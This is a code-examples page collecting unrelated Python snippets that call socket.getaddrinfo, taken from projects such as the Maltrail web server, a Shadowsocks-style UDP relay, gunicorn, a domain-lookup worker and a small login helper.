                    if config.SHOW_DEBUG:
                        traceback.print_exc()

            return content

        def _logout(self, params):
            self.delete_session()
            self.send_response(_http_client.FOUND)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.LOCATION, "/")

        def _whoami(self, params):
            session = self.get_session()
            username = session.username if session else ""

            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

            return username

        def _check_ip(self, params):
            session = self.get_session()

            if session is None:
                self.send_response(_http_client.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None

            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

            try:
                result_worst = worst_asns(params.get("address"))
                if result_worst:
                    result_ipcat = result_worst
                else:
                    _ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
                    result_ipcat = _[1] if _[0] == 'the' else _[0]
                return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()

        def _trails(self, params):
            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

            return open(config.TRAILS_FILE, "rb").read()

        def _ping(self, params):
            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

            return PING_RESPONSE

        def _events(self, params):
            session = self.get_session()

            if session is None:
                self.send_response(_http_client.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None

            start, end, size, total = None, None, -1, None
            content = None
            log_exists = False
            dates = params.get("date", "")

            if ".." in dates:
                pass
            elif '_' not in dates:
                try:
                    date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
                    event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
                    if os.path.exists(event_log_path):
                        range_handle = open(event_log_path, "rb")
                        log_exists = True
                except ValueError:
                    print("[!] invalid date format in request")
                    log_exists = False
            else:
                logs_data = ""
                date_interval = dates.split("_", 1)
                try:
                    start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
                    end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
                    for i in xrange(int((end_date - start_date).days) + 1):
                        date = start_date + datetime.timedelta(i)
                        event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
                        if os.path.exists(event_log_path):
                            log_handle = open(event_log_path, "rb")
                            logs_data += log_handle.read()
                            log_handle.close()

                    range_handle = io.BytesIO(logs_data)
                    log_exists = True
                except ValueError:
                    print("[!] invalid date format in request")
                    log_exists = False

            if log_exists:
                range_handle.seek(0, 2)
                total = range_handle.tell()
                range_handle.seek(0)

                if self.headers.get(HTTP_HEADER.RANGE):
                    match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
                    if match:
                        start, end = int(match.group(1)), int(match.group(2))
                        max_size = end - start + 1
                        end = min(total - 1, end)
                        size = end - start + 1

                        if start == 0 or not session.range_handle:
                            session.range_handle = range_handle

                        if session.netfilters is None and not session.mask_custom:
                            session.range_handle.seek(start)
                            self.send_response(_http_client.PARTIAL_CONTENT)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
                            self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
                            content = session.range_handle.read(size)
                        else:
                            self.send_response(_http_client.OK)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")

                            buffer, addresses, netmasks, regex = io.StringIO(), set(), [], ""
                            for netfilter in session.netfilters or []:
                                if not netfilter:
                                    continue
                                if '/' in netfilter:
                                    netmasks.append(netfilter)
                                elif re.search(r"\A[\d.]+\Z", netfilter):
                                    addresses.add(netfilter)
                                elif "\\." in netfilter:
                                    regex = r"\b(%s)\b" % netfilter
                                else:
                                    print("[!] invalid network filter '%s'" % netfilter)
                                    return

                            for line in session.range_handle:
                                display = session.netfilters is None
                                ip = None
                                line = line.decode(UNICODE_ENCODING, "ignore")

                                if regex:
                                    match = re.search(regex, line)
                                    if match:
                                        ip = match.group(1)
                                        display = True

                                if not display and (addresses or netmasks):
                                    for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
                                        if not display:
                                            ip = match.group(1)
                                        else:
                                            break

                                        if ip in addresses:
                                            display = True
                                            break
                                        elif netmasks:
                                            for _ in netmasks:
                                                prefix, mask = _.split('/')
                                                if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
                                                    addresses.add(ip)
                                                    display = True
                                                    break

                                if session.mask_custom and "(custom)" in line:
                                    line = re.sub(r'("[^"]+"|[^ ]+) \(custom\)', "- (custom)", line)

                                if display:
                                    if ",%s" % ip in line or "%s," % ip in line:
                                        line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
                                    buffer.write(line)
                                    if buffer.tell() >= max_size:
                                        break

                            content = buffer.getvalue()
                            end = start + len(content) - 1
                            self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))

                        if len(content) < max_size:
                            session.range_handle.close()
                            session.range_handle = None

                if size == -1:
                    self.send_response(_http_client.OK)
                    self.send_header(HTTP_HEADER.CONNECTION, "close")
                    self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
                    self.end_headers()

                    with range_handle as f:
                        while True:
                            data = f.read(io.DEFAULT_BUFFER_SIZE)
                            if not data:
                                break
                            else:
                                self.wfile.write(data)

            else:
                self.send_response(_http_client.OK)  # instead of _http_client.NO_CONTENT (compatibility reasons)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                if self.headers.get(HTTP_HEADER.RANGE):
                    self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")

            return content

        def _counts(self, params):
            counts = {}

            session = self.get_session()

            if session is None:
                self.send_response(_http_client.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None

            self.send_response(_http_client.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")

            match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
            if match:
                min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
            else:
                min_ = datetime.datetime.fromtimestamp(0)

            match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
            if match:
                max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
            else:
                max_ = datetime.datetime.now()

            min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
            max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)

            for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
                filename = os.path.basename(filepath)
                if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
                    continue
                try:
                    current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
                except:
                    if config.SHOW_DEBUG:
                        traceback.print_exc()
                else:
                    if min_ <= current <= max_:
                        timestamp = int(time.mktime(current.timetuple()))
                        size = os.path.getsize(filepath)
                        with open(filepath, "rb") as f:
                            content = f.read(io.DEFAULT_BUFFER_SIZE)
                            if size >= io.DEFAULT_BUFFER_SIZE:
                                total = 1.0 * content.count(b'\n') * size / io.DEFAULT_BUFFER_SIZE
                                counts[timestamp] = int(round(total / 100) * 100)
                            else:
                                counts[timestamp] = content.count(b'\n')

            return json.dumps(counts)

    class SSLReqHandler(ReqHandler):
        def setup(self):
            self.connection = self.request
            self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
            self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)

    # IPv6 support
    if ':' in (address or ""):
        address = address.strip("[]")

        _BaseHTTPServer.HTTPServer.address_family = socket.AF_INET6

        # Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
        _AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
        _NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV

        _address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
    else:
        _address = (address or '', int(port) if str(port or "").isdigit() else 0)

    try:
        if pem:
            server = SSLThreadingServer(_address, pem, SSLReqHandler)
        else:
            server = ThreadingServer(_address, ReqHandler)
    except Exception as ex:
        if "Address already in use" in str(ex):
            exit("[!] another instance already running")
        elif "Name or service not known" in str(ex):
            exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
        elif "Cannot assign requested address" in str(ex):
            exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
        else:
            raise

    print("[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1]))

    print("[o] running...")

    if join:
        server.serve_forever()
    else:
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
Example #41
0
File: udprelay.py Project: able8/ss
    def _handle_server(self):
        server = self._server_socket
        data, r_addr = server.recvfrom(BUF_SIZE)
        if not data:
            logging.debug('UDP handle_server: data is empty')
        if self._is_local:
            frag = common.ord(data[2])
            if frag != 0:
                logging.warn('drop a message since frag is not 0')
                common.error_to_file('drop a message since frag is not 0',self._config)
                return
            else:
                data = data[3:]
        else:
            data = encrypt.encrypt_all(self._password, self._method, 0, data)
            # decrypt data
            if not data:
                logging.debug('UDP handle_server: data is empty after decrypt')
                return
        header_result = parse_header(data,self._config)
        if header_result is None:
            return
        addrtype, dest_addr, dest_port, header_length = header_result

        if self._is_local:
            server_addr, server_port = self._get_a_server()
        else:
            server_addr, server_port = dest_addr, dest_port

        addrs = self._dns_cache.get(server_addr, None)
        if addrs is None:
            addrs = socket.getaddrinfo(server_addr, server_port, 0,
                                       socket.SOCK_DGRAM, socket.SOL_UDP)
            if not addrs:
                # drop
                return
            else:
                self._dns_cache[server_addr] = addrs

        af, socktype, proto, canonname, sa = addrs[0]
        key = client_key(r_addr, af)

        client = self._cache.get(key, None)
        if not client:
            # TODO async getaddrinfo
            if self._forbidden_iplist:
                if common.to_str(sa[0]) in self._forbidden_iplist:
                    logging.debug('IP %s is in forbidden list, drop' %
                                  common.to_str(sa[0]))
                    # drop
                    return
            client = socket.socket(af, socktype, proto)
            client.setblocking(False)
            self._cache[key] = client
            self._client_fd_to_server_addr[client.fileno()] = r_addr

            self._sockets.add(client.fileno())
            self._eventloop.add(client, eventloop.POLL_IN, self)
        if self._stat_callback:
            self._stat_callback(self._listen_port, len(data))
        if self._is_local:
            data = encrypt.encrypt_all(self._password, self._method, 1, data)
            if not data:
                return
        else:
            data = data[header_length:]
        if not data:
            return
        try:
            client.sendto(data, (server_addr, server_port))
            if not self._is_local:
                if self._config.has_key('port_limit') and self._config['port_limit'] != "" and os.path.exists(self._config['port_limit']):
                    port_limits = json.loads(open(self._config['port_limit']).read())
                    if str(self._listen_port) in port_limits:
                        port_limits['%s' % self._listen_port]['used'] = port_limits['%s' % self._listen_port]['used'] + len(data) + BUF_SIZE
                        open('%s' % self._config['port_limit'],"w").write("%s" % json.dumps(port_limits,indent=4,ensure_ascii=False,sort_keys=True))
        except IOError as e:
            err = eventloop.errno_from_exception(e)
            if err in (errno.EINPROGRESS, errno.EAGAIN):
                pass
            else:
                shell.print_exception(e)
Example #42
0
#!usr/bin/python3
import firebirdsql as fb
import xlrd
import pandas as pd
import socket
from contextlib import closing
from datetime import datetime

socket.getaddrinfo('localhost', 8080)
con = fb.connect(host='localhost',
                 database='caminho do banco',
                 user='******',
                 password='******')
NFCe = pd.read_excel('caminho do excel')
log = open('caminho no txt para saida', 'w')

cur = con.cursor()
#variaveis que armazenam as colunas do excel
excel_Num = NFCe['Numero']
excel_Situacao = NFCe['Situacao']
excel_data = NFCe['Data_Emissao']
excel_chave = NFCe['Chave_Acesso']
excel_valor = NFCe['Valor N.F.']
excel_chave_edit = []
listNFCE = excel_Num.tolist()
cont = 0
cupons_existentes = []
notas_nulas = []
CHV_NFCE = []
VALOR = []
DESCTO = []
Example #43
0
    def _handle_server_dns_resolved(self, remote_addr, addrs, server_addr,
                                    dns_resolved, data, r_addr, uid,
                                    header_length, is_relay):
        if uid is None:
            user_id = self._listen_port
        else:
            user_id = uid
        try:
            server_port = remote_addr[1]
            if addrs is None:
                addrs = socket.getaddrinfo(server_addr, server_port, 0,
                                           socket.SOCK_DGRAM, socket.SOL_UDP)
            if not addrs:  # drop
                return
            af, socktype, proto, canonname, sa = addrs[0]
            server_addr = sa[0]
            key = client_key(r_addr, af)
            client_pair = self._cache.get(key, None)
            if client_pair is None:
                client_pair = self._cache_dns_client.get(key, None)
            if client_pair is None:
                if self._forbidden_iplist:
                    if common.to_str(sa[0]) in self._forbidden_iplist:
                        logging.debug('IP %s is in forbidden list, drop' %
                                      common.to_str(sa[0]))
                        # drop
                        return
                if self._forbidden_portset:
                    if sa[1] in self._forbidden_portset:
                        logging.debug('Port %d is in forbidden list, reject' %
                                      sa[1])
                        # drop
                        return
                client = socket.socket(af, socktype, proto)
                client_uid = uid
                client.setblocking(False)
                self._socket_bind_addr(client, af, is_relay)
                is_dns = False
                if len(data) > header_length + 13 and data[
                        header_length + 4:header_length +
                        12] == b"\x00\x01\x00\x00\x00\x00\x00\x00":
                    is_dns = True
                else:
                    pass
                if sa[1] == 53 and is_dns:  #DNS
                    logging.debug("DNS query %s from %s:%d" %
                                  (common.to_str(sa[0]), r_addr[0], r_addr[1]))
                    self._cache_dns_client[key] = (client, uid)
                else:
                    self._cache[key] = (client, uid)
                self._client_fd_to_server_addr[client.fileno()] = (r_addr, af)

                self._sockets.add(client.fileno())
                self._eventloop.add(client, eventloop.POLL_IN, self)

                logging.debug('UDP port %5d sockets %d' %
                              (self._listen_port, len(self._sockets)))

                if not self.is_pushing_detect_text_list:
                    for id in self.detect_text_list:
                        if common.match_regex(
                                self.detect_text_list[id]['regex'],
                                common.to_str(data)):
                            if self._config['is_multi_user'] != 0 and uid != 0:
                                if self.is_cleaning_mu_detect_log_list == False and id not in self.mu_detect_log_list[
                                        uid]:
                                    self.mu_detect_log_list[uid].append(id)
                            else:
                                if self.is_cleaning_detect_log == False and id not in self.detect_log_list:
                                    self.detect_log_list.append(id)
                            raise Exception(
                                'This connection match the regex: id:%d was reject,regex: %s ,connecting %s:%d from %s:%d via port %d'
                                % (self.detect_text_list[id]['id'],
                                   self.detect_text_list[id]['regex'],
                                   common.to_str(server_addr), server_port,
                                   r_addr[0], r_addr[1], self._listen_port))
                if not self.is_pushing_detect_hex_list:
                    for id in self.detect_hex_list:
                        if common.match_regex(
                                self.detect_hex_list[id]['regex'],
                                binascii.hexlify(data)):
                            if self._config['is_multi_user'] != 0 and uid != 0:
                                if self.is_cleaning_mu_detect_log_list == False and id not in self.mu_detect_log_list[
                                        uid]:
                                    self.mu_detect_log_list[uid].append(id)
                            else:
                                if self.is_cleaning_detect_log == False and id not in self.detect_log_list:
                                    self.detect_log_list.append(id)
                            raise Exception(
                                'This connection match the regex: id:%d was reject,regex: %s ,connecting %s:%d from %s:%d via port %d'
                                % (self.detect_hex_list[id]['id'],
                                   self.detect_hex_list[id]['regex'],
                                   common.to_str(server_addr), server_port,
                                   r_addr[0], r_addr[1], self._listen_port))
                if not self._connect_hex_data:
                    common.connect_log(
                        'UDP data to %s:%d from %s:%d via port %d' %
                        (common.to_str(server_addr), server_port, r_addr[0],
                         r_addr[1], self._listen_port))
                else:
                    common.connect_log(
                        'UDP data to %s:%d from %s:%d via port %d,hex data : %s'
                        %
                        (common.to_str(server_addr), server_port, r_addr[0],
                         r_addr[1], self._listen_port, binascii.hexlify(data)))
                if self._config['is_multi_user'] != 2:
                    if common.to_str(
                            r_addr[0]
                    ) in self.wrong_iplist and r_addr[
                            0] != 0 and self.is_cleaning_wrong_iplist == False:
                        del self.wrong_iplist[common.to_str(r_addr[0])]
                    if common.get_ip_md5(
                            r_addr[0], self._config['ip_md5_salt']
                    ) not in self.connected_iplist and r_addr[
                            0] != 0 and self.is_cleaning_connected_iplist == False:
                        self.connected_iplist.append(
                            common.get_ip_md5(r_addr[0],
                                              self._config['ip_md5_salt']))
            else:
                client, client_uid = client_pair
            self._cache.clear(self._udp_cache_size)
            self._cache_dns_client.clear(16)

            if self._is_local:
                ref_iv = [encrypt.encrypt_new_iv(self._method)]
                self._protocol.obfs.server_info.iv = ref_iv[0]
                data = self._protocol.client_udp_pre_encrypt(data)
                #logging.debug("%s" % (binascii.hexlify(data),))
                data = encrypt.encrypt_all_iv(
                    self._protocol.obfs.server_info.key, self._method, 1, data,
                    ref_iv)
                if not data:
                    return
            else:
                data = data[header_length:]
            if not data:
                return
        except Exception as e:
            shell.print_exception(e)
            logging.error("exception from user %d" % (uid, ))

        try:
            client.sendto(data, (server_addr, server_port))
            self.add_transfer_u(client_uid, len(data))
            if client_pair is None:  # new request
                addr, port = client.getsockname()[:2]
                common.connect_log(
                    'UDP data to %s(%s):%d from %s:%d by user %d' %
                    (common.to_str(remote_addr[0]), common.to_str(server_addr),
                     server_port, addr, port, user_id))
        except IOError as e:
            err = eventloop.errno_from_exception(e)
            logging.warning('IOError sendto %s:%d by user %d' %
                            (server_addr, server_port, user_id))
            if err in (errno.EINPROGRESS, errno.EAGAIN):
                pass
            else:
                shell.print_exception(e)
Example #44
0
def send_email():
    msg = MIMEText('Hello Santhosh')
    socket.getaddrinfo('smtp.mail.google.com',8080)
    s = smtplib.SMTP('smtp.mail.google.com')
    s.sendmail(msg['*****@*****.**'],msg['*****@*****.**'],msg.as_string())
    s.quit()
Example #45
0
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.

import errno
import os
import socket
socket.getaddrinfo('localhost', 25)
import stat
import sys
import time

from gunicorn import util


class BaseSocket(object):
    def __init__(self, address, conf, log, fd=None):
        self.log = log
        self.conf = conf

        self.cfg_addr = address
        if fd is None:
            sock = socket.socket(self.FAMILY, socket.SOCK_STREAM)
            bound = False
        else:
            sock = socket.fromfd(fd, self.FAMILY, socket.SOCK_STREAM)
            os.close(fd)
            bound = True

        self.sock = self.set_options(sock, bound=bound)
Example #46
0
    def run(self):
        while not self.kill_received:
            try:
                domain = self.jobs.get(block=False)
            except queue.Empty:
                self.kill_received = True
                return

            domain['domain-name'] = domain['domain-name'].encode(
                'idna').decode()

            if self.option_extdns:
                if self.nameservers:
                    resolv = dns.resolver.Resolver(configure=False)
                    resolv.nameservers = self.nameservers
                else:
                    resolv = dns.resolver.Resolver()

                resolv.lifetime = REQUEST_TIMEOUT_DNS * REQUEST_RETRIES_DNS
                resolv.timeout = REQUEST_TIMEOUT_DNS

                nxdomain = False
                dns_ns = False
                dns_a = False
                dns_aaaa = False
                dns_mx = False

                try:
                    domain['dns-ns'] = self.__answer_to_list(
                        resolv.query(domain['domain-name'],
                                     rdtype=dns.rdatatype.NS))
                    dns_ns = True
                except dns.resolver.NXDOMAIN:
                    nxdomain = True
                    pass
                except dns.resolver.NoNameservers:
                    domain['dns-ns'] = ['!ServFail']
                    pass
                except DNSException:
                    pass

                if nxdomain is False:
                    try:
                        domain['dns-a'] = self.__answer_to_list(
                            resolv.query(domain['domain-name'],
                                         rdtype=dns.rdatatype.A))
                        dns_a = True
                    except dns.resolver.NoNameservers:
                        domain['dns-a'] = ['!ServFail']
                        pass
                    except DNSException:
                        pass

                    try:
                        domain['dns-aaaa'] = self.__answer_to_list(
                            resolv.query(domain['domain-name'],
                                         rdtype=dns.rdatatype.AAAA))
                        dns_aaaa = True
                    except dns.resolver.NoNameservers:
                        domain['dns-aaaa'] = ['!ServFail']
                        pass
                    except DNSException:
                        pass

                if nxdomain is False and dns_ns is True:
                    try:
                        domain['dns-mx'] = self.__answer_to_list(
                            resolv.query(domain['domain-name'],
                                         rdtype=dns.rdatatype.MX))
                        dns_mx = True
                    except dns.resolver.NoNameservers:
                        domain['dns-mx'] = ['!ServFail']
                        pass
                    except DNSException:
                        pass
            else:
                try:
                    ip = socket.getaddrinfo(domain['domain-name'], 80)
                except socket.gaierror as e:
                    if e.errno == -3:
                        domain['dns-a'] = ['!ServFail']
                    pass
                except Exception:
                    pass
                else:
                    domain['dns-a'] = list()
                    domain['dns-aaaa'] = list()
                    for j in ip:
                        if '.' in j[4][0]:
                            domain['dns-a'].append(j[4][0])
                        if ':' in j[4][0]:
                            domain['dns-aaaa'].append(j[4][0])
                    domain['dns-a'] = sorted(domain['dns-a'])
                    domain['dns-aaaa'] = sorted(domain['dns-aaaa'])
                    dns_a = True
                    dns_aaaa = True

            if self.option_mxcheck:
                if dns_mx is True:
                    if domain['domain-name'] != self.domain_init:
                        if self.__mxcheck(domain['dns-mx'][0],
                                          self.domain_init,
                                          domain['domain-name']):
                            domain['mx-spy'] = True

            if self.option_geoip:
                if dns_a is True:
                    try:
                        country = GeoIP.new(
                            GeoIP.GEOIP_MEMORY_CACHE).country_name_by_addr(
                                domain['dns-a'][0])
                    except Exception:
                        pass
                    else:
                        if country:
                            domain['geoip-country'] = country.split(',')[0]

            if self.option_banners:
                if dns_a is True:
                    banner = self.__banner_http(domain['dns-a'][0],
                                                domain['domain-name'])
                    if banner:
                        domain['banner-http'] = banner
                if dns_mx is True:
                    banner = self.__banner_smtp(domain['dns-mx'][0])
                    if banner:
                        domain['banner-smtp'] = banner

            if self.option_ssdeep:
                if dns_a is True or dns_aaaa is True:
                    try:
                        req = requests.get(
                            self.uri_scheme + '://' + domain['domain-name'] +
                            self.uri_path + self.uri_query,
                            timeout=REQUEST_TIMEOUT_HTTP,
                            headers={'User-Agent': self.useragent},
                            verify=False)
                    except Exception:
                        pass
                    else:
                        if req.status_code // 100 == 2 and req.url.split(
                                '?')[0] != self.ssdeep_effective_url:
                            ssdeep_curr = ssdeep.hash(''.join(
                                req.text.split()).lower())
                            domain['ssdeep-score'] = ssdeep.compare(
                                self.ssdeep_init, ssdeep_curr)

            domain['domain-name'] = domain['domain-name'].encode().decode(
                'idna')
            self.jobs.task_done()
Example #47
0
def get_cookie():
    log("Cookie", "new connection cookie value (authentication) ...")

    # sets the "initial" socket reference as invalid
    # this is considered the default behavior
    _socket = None

    # parses the current base url unpacking it into the host
    # and part components to be used in the connection
    parse = urlparse.urlparse(BASE_URL)
    host = parse.hostname
    port = parse.port

    # tries to resolve the provided address into defined
    # address for the provided types (tcp)
    results = socket.getaddrinfo(host, port, socket.AF_UNSPEC,
                                 socket.SOCK_STREAM)

    # iterates over all the resolution results to try
    # to create and connect to an associated socket
    for result in results:
        # unpacks the current result into the appropriate
        # parts to be used in the socket creation
        af, socktype, proto, _canon, address = result

        # creates the socket object from the (unpacked) results
        # of the resolution
        try:
            _socket = socket.socket(af, socktype, proto)
        except socket.error:
            _socket = None
            continue

        # tries to connect to the remote host, in case there's
        # an error closes the socket sets it as invalid and continues
        # the current loop (tries again)
        try:
            _socket.connect(address)
        except socket.error:
            _socket.close()
            _socket = None
            continue

        # in case this point is reached a correct connection
        # was established, no need to continues the loop
        break

    # in case no socket was created must raise an exception
    # indicating the problem
    if _socket == None: raise RuntimeError("Socket creation was not possible")

    # creates the "final" post message to be sent to the server
    # using the currently set username and password values
    data = COOKIE_DATA % (USERNAME, PASSWORD)
    message = COOKIE_MESSAGE % (len(data), data)

    # sends the "final" message to the server and then waits
    # for the response value from it
    _socket.sendall(message)
    data = []
    while True:
        _data = _socket.recv(1024)
        if not _data: break
        data.append(_data)

    # closes the socket no need for it to remain open (no
    # more data to be transmitted)
    _socket.close()

    # in case no data was received must return an invalid
    # cookie value immediately
    if not data: return None

    # joins the complete set of data for the response and
    # then splits the response into various lines
    response = "".join(data)
    lines = response.split("\n")
    headers = lines[1:]

    # starts the cookie value as unset, this is the default
    # value to be used in case it's not found
    cookie = None

    # iterates over the complete set of headers to try to find
    # the set cookie header and retrieve its value
    for header in headers:
        header_s = header.strip().split(":", 1)
        if len(header_s) == 1: continue
        name, value = header_s
        if not name == "Set-Cookie": continue
        cookie = value.strip()

    # prints a message indicating the finding of the cookie value
    # and returns the string containing it
    log("Cookie", "authentication cookie received '%s'" % cookie)
    return cookie
Example #48
0
    def __init__(self,
                 config,
                 dns_resolver,
                 is_local,
                 stat_callback=None,
                 stat_counter=None):
        self._config = config
        if config.get('connect_verbose_info', 0) > 0:
            common.connect_log = logging.info

        if config.get('connect_hex_data', 0) > 0:
            self._connect_hex_data = True
        else:
            self._connect_hex_data = False

        if is_local:
            self._listen_addr = config['local_address']
            self._listen_port = config['local_port']
            self._remote_addr = config['server']
            self._remote_port = config['server_port']
        else:
            self._listen_addr = config['server']
            self._listen_port = config['server_port']
            self._remote_addr = None
            self._remote_port = None
        self._dns_resolver = dns_resolver
        self._password = common.to_bytes(config['password'])
        self._method = config['method']
        self._timeout = config['timeout']
        self._is_local = is_local
        self._udp_cache_size = config['udp_cache']
        self._cache = lru_cache.LRUCache(
            timeout=config['udp_timeout'],
            close_callback=self._close_client_pair)
        self._cache_dns_client = lru_cache.LRUCache(
            timeout=10, close_callback=self._close_client_pair)
        self._client_fd_to_server_addr = {}
        #self._dns_cache = lru_cache.LRUCache(timeout=1800)
        self._eventloop = None
        self._closed = False
        self.server_transfer_ul = 0
        self.server_transfer_dl = 0

        self.connected_iplist = []
        self.wrong_iplist = {}
        self.detect_log_list = []

        self.is_cleaning_connected_iplist = False
        self.is_cleaning_wrong_iplist = False
        self.is_cleaning_detect_log = False
        self.is_cleaning_mu_detect_log_list = False
        self.is_cleaning_mu_connected_iplist = False

        if 'users_table' in self._config:
            self.multi_user_table = self._config['users_table']

        self.mu_server_transfer_ul = {}
        self.mu_server_transfer_dl = {}
        self.mu_connected_iplist = {}
        self.mu_detect_log_list = {}

        self.is_pushing_detect_hex_list = False
        self.is_pushing_detect_text_list = False
        self.detect_hex_list = self._config['detect_hex_list'].copy()
        self.detect_text_list = self._config['detect_text_list'].copy()

        self.protocol_data = obfs.obfs(config['protocol']).init_data()
        self._protocol = obfs.obfs(config['protocol'])
        server_info = obfs.server_info(self.protocol_data)
        server_info.host = self._listen_addr
        server_info.port = self._listen_port
        if 'users_table' in self._config:
            server_info.users = self.multi_user_table
        else:
            server_info.users = {}
        server_info.is_multi_user = config["is_multi_user"]
        server_info.protocol_param = config['protocol_param']
        server_info.obfs_param = ''
        server_info.iv = b''
        server_info.recv_iv = b''
        server_info.key_str = common.to_bytes(config['password'])
        server_info.key = encrypt.encrypt_key(self._password, self._method)
        server_info.head_len = 30
        server_info.tcp_mss = 1452
        server_info.buffer_size = BUF_SIZE
        server_info.overhead = 0
        self._protocol.set_server_info(server_info)

        self._sockets = set()
        self._fd_to_handlers = {}
        self._reqid_to_hd = {}
        self._data_to_write_to_server_socket = []

        self._timeouts = []  # a list for all the handlers
        # we trim the timeouts once a while
        self._timeout_offset = 0  # last checked position for timeout
        self._handler_to_timeouts = {}  # key: handler value: index in timeouts

        self._bind = config.get('out_bind', '')
        self._bindv6 = config.get('out_bindv6', '')
        self._ignore_bind_list = config.get('ignore_bind', [])

        if 'forbidden_ip' in config:
            self._forbidden_iplist = IPNetwork(config['forbidden_ip'])
        else:
            self._forbidden_iplist = None
        if 'forbidden_port' in config:
            self._forbidden_portset = PortRange(config['forbidden_port'])
        else:
            self._forbidden_portset = None
        if 'disconnect_ip' in config:
            self._disconnect_ipset = config['disconnect_ip'].split(',')
        else:
            self._disconnect_ipset = None

        self._relay_rules = self._config['relay_rules'].copy()
        self._is_pushing_relay_rules = False

        addrs = socket.getaddrinfo(self._listen_addr, self._listen_port, 0,
                                   socket.SOCK_DGRAM, socket.SOL_UDP)
        if len(addrs) == 0:
            raise Exception("can't get addrinfo for %s:%d" %
                            (self._listen_addr, self._listen_port))
        af, socktype, proto, canonname, sa = addrs[0]
        server_socket = socket.socket(af, socktype, proto)
        server_socket.bind((self._listen_addr, self._listen_port))
        server_socket.setblocking(False)
        self._server_socket = server_socket
        self._stat_callback = stat_callback
Example #49
0
        break
        #addrinfo[0], addrinfo[1], addrinfo[2], addrinfo[3], addrinfo[4] = res
        # returns tuple aifamily, socktype, proto, canonname, sa
    #print 'length addrinfo ' + repr(len(addrinfo)) + ' addrinfo:' + str(addrinfo)
    try:
        sock = socket.socket(addrinfo[0], addrinfo[1], addrinfo[2])
    except socket.error, msg:
        print 'failed to create socket'
        sock = None
    if sock != None:
        try:
            myaddrinfo = None
            #print 'getting myaddrinfo'
            #myaddrinfo = socket.getaddrinfo(None, 0,  addrinfo[0], socktp, 0, \
            #                            (socket.AI_PASSIVE or socket.AI_NUMERICSERV))
            for res in socket.getaddrinfo(None, 0,  addrinfo[0], addrinfo[1], 0, \
                                                (socket.AI_PASSIVE or socket.AI_NUMERICSERV)):
                myaddrinfo = res
                break
            #print 'length myaddrinfo ' + repr(len(myaddrinfo)) + ' addrinfo:' + str(myaddrinfo)
            sock.bind(myaddrinfo[4])
            #print 'successful bind'
            sock.connect(addrinfo[4])
        except socket.error, msg:
            print 'failed to bind and connect:'
            sock.close()
            sock = None

    if sock == None:
        print 'could not open socket'
    return sock
Example #50
0
#!/usr/bin/python

# Echo server program
import socket
import sys

